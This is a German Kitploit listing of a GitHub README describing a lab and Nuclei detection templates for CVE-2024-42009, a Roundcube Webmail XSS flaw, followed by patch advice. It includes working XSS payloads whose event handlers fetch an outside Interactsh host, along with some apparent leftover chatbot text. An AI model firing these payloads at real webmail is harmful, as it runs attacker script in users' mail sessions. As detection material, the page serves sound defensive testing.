Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-42009 — Nuclei template und Laborumgebung, um CVE-2024-42009, eine kritische Reflected-XSS-Sicherheitslücke in Roundcube Webmail, sicher zu demonstrieren, unter Verwendung von OOB-Erkennung via Interactsh für autorisierte Tests. | Kitploit
Tools/GitHubGitHub/shubhankargupta691/cve-2024-42009
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubshubhankargupta691/cve-2024-42009

CVE-2024-42009

Nuclei template und Laborumgebung, um CVE-2024-42009, eine kritische Reflected-XSS-Sicherheitslücke in Roundcube Webmail, sicher zu demonstrieren, unter Verwendung von OOB-Erkennung via Interactsh für autorisierte Tests.

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen
Repository anzeigen
vor 11 MonatenNoch nicht geprüft

CVE-2024-42009 – Reflektiertes XSS in Roundcube Webmail

📌 Übersicht

Dieses Repository enthält eine Nuclei-Vorlage und unterstützende Ressourcen, um CVE-2024-42009, eine kritische reflektierte XSS-Schwachstelle in Roundcube Webmail, sicher zu demonstrieren und zu validieren. Der Fehler liegt in der Funktion message_body() in show.php, wo Modifikationen nach der Bereinigung zu einer Entsanitisierung und unsicheren Wiedergabe von manipuliertem HTML-E-Mail-Inhalt führen.

⚠️ Dieser PoC ist nur für Bildungszwecke und autorisierte Tests bestimmt. Verwenden Sie ihn nicht gegen Systeme, die Sie nicht besitzen oder für die Sie keine ausdrückliche Erlaubnis zum Testen haben.


🧠 Schwachstellenübersicht

  • CVE-ID: CVE-2024-42009
  • Schweregrad: Kritisch (CVSS 9.8)
  • Betroffene Versionen: Roundcube ≤ 1.6.7 und ≤ 1.5.7
  • Gepatchte Versionen: 1.6.8 und 1.5.8
  • Komponente: message_body() in show.php
  • Auswirkungen: Beliebige JavaScript-Ausführung, wenn ein Benutzer eine bösartige E-Mail ansieht

🧪 Erkennungsstrategie (Nur für Laborgebrauch)

Dieses Repository verwendet die Out-of-Band (OOB)-Erkennung über Interactsh, um die JavaScript-Ausführung in einer kontrollierten Laborumgebung zu bestätigen.

Wichtige Schritte:

  1. Stellen Sie eine angreifbare Roundcube-Instanz bereit (z.B. über Docker)
  2. Senden Sie eine präparierte E-Mail mit <body>-Tag, das onanimationstart und einen Beacon an Interactsh enthält
  3. Öffnen Sie die E-Mail in der Roundcube-Benutzeroberfläche
  4. Bestätigen Sie den DNS/HTTP-Callback an die Interactsh-Domain

🐳 Laboraufbau

Verwenden Sie die bereitgestellte Docker-Compose-Datei, um eine lokale Roundcube-Instanz mit MailHog (SMTP-Sink) und MariaDB zu starten.

root@kitploit:~
git clone https://github.com/Shubhankargupta691/CVE-2024-42009.git
cd CVE-2024-42009
docker compose up -d
  • Roundcube-Benutzeroberfläche: http://localhost:8080
  • MailHog-Benutzeroberfläche: http://localhost:8025
  • Anmeldemethode: Google-Konto

⚠️ Verwenden Sie nicht Ihr Google-Konto.


📁 Repository-Inhalte

  • CVE-2024-42009-OOB.yaml – Nuclei-Vorlage mit Interactsh- und Out-of-Band (OOB)-Erkennung
  • CVE-2024-42009.yaml – Nuclei-Vorlage ohne Interactsh und OOB
  • docker-compose.yml – Einrichtung der Laborumgebung für Roundcube Webmail
  • Images/ – Screenshots, die HTTP/DNS-Treffer von Interactsh zeigen

🎥 Videodemonstration

Dieses Video führt durch die gesamte Exploit-Kette:

  • Erstellung des Payloads
  • Senden per E-Mail oder Endpunkt
  • Auslösen der Schwachstelle
  • Bestätigen des Beacons über Interactsh

(Videodemo)


Um diese XSS-Payloads verantwortungsvoll in Ihre README aufzunehmen, sollten Sie sie in einem Abschnitt platzieren, der deutlich für Bildungs- oder Testzwecke gekennzeichnet ist. Hier ist eine vorgeschlagene Struktur:


🧪 XSS-Payload-Beispiele (Nur zu Testzwecken)

⚠️ Haftungsausschluss: Diese Payloads sind nur für Bildungszwecke und autorisierte Sicherheitstests bestimmt. Setzen Sie sie nicht auf Systemen ohne ausdrückliche Genehmigung ein.

root@kitploit:~
<!-- Image tag with onerror -->
<img src="https://interact.sh/xss-test" onerror="fetch('https://interact.sh/hit')">

<!-- Broken image source with onerror -->
<img src="https://raw.githubusercontent.com/shubhankargupta691/cve-2024-42009/HEAD/x" onerror="fetch('https://interact.sh/hit')">

<!-- SVG with onload -->
<svg onload="fetch('https://interact.sh/hit')"></svg>

<!-- Script tag -->
<script>fetch('https://interact.sh/hit')</script>

<!-- JavaScript in iframe src -->

🧭 Verwendung

  • Ersetzen Sie https://interact.sh/hit durch Ihren eigenen Listener-Endpunkt.
  • Verwenden Sie diese in kontrollierten Umgebungen wie lokalen Laboren oder CTF-Plattformen.
  • Überwachen Sie Ihren Endpunkt auf eingehende Anfragen, um die Ausführung zu validieren.

🛡️ Abhilfe

Aktualisieren Sie Roundcube auf:

  • 1.6.8 oder 1.5.8
    Diese Versionen entfernen die anfällige Nachbearbeitungslogik und wenden strengere Bereinigung und CSP-Header an.

📜 Referenzen

Perfekt — hier sehen Sie einen sauberen und professionellen Referenzen-Abschnitt, den Sie in Ihre README oder E-Mail-Einreichung für CVE-2024-42009 aufnehmen können. Er zitiert alle von Ihnen aufgeführten Quellen, formatiert für Klarheit und Glaubwürdigkeit:


📚 Referenzen

  • NVD CVE-Eintrag – CVE-2024-42009 – Offizielle Schwachstellenauflistung mit CVSS-Wert und betroffenen Versionen
  • SonarSource Blog – Regierungs-E-Mails in Gefahr – Detaillierte technische Analyse und Exploit-Aufschlüsselung
  • GitHub PoC von DaniTheHack3r – Python-basierter Exploit mit E-Mail-Listener und animationsgesteuertem Payload
  • GitHub PoC von Bhanunamikaze – Automatisierte Payload-Injektion und Exfiltration über HTTP-Listener
  • GitHub PoC von 0xbassiouny1337 – Stored-XSS-Exploit mit Echtzeit-E-Mail-Erfassung und -Decodierung

Tool herunterladen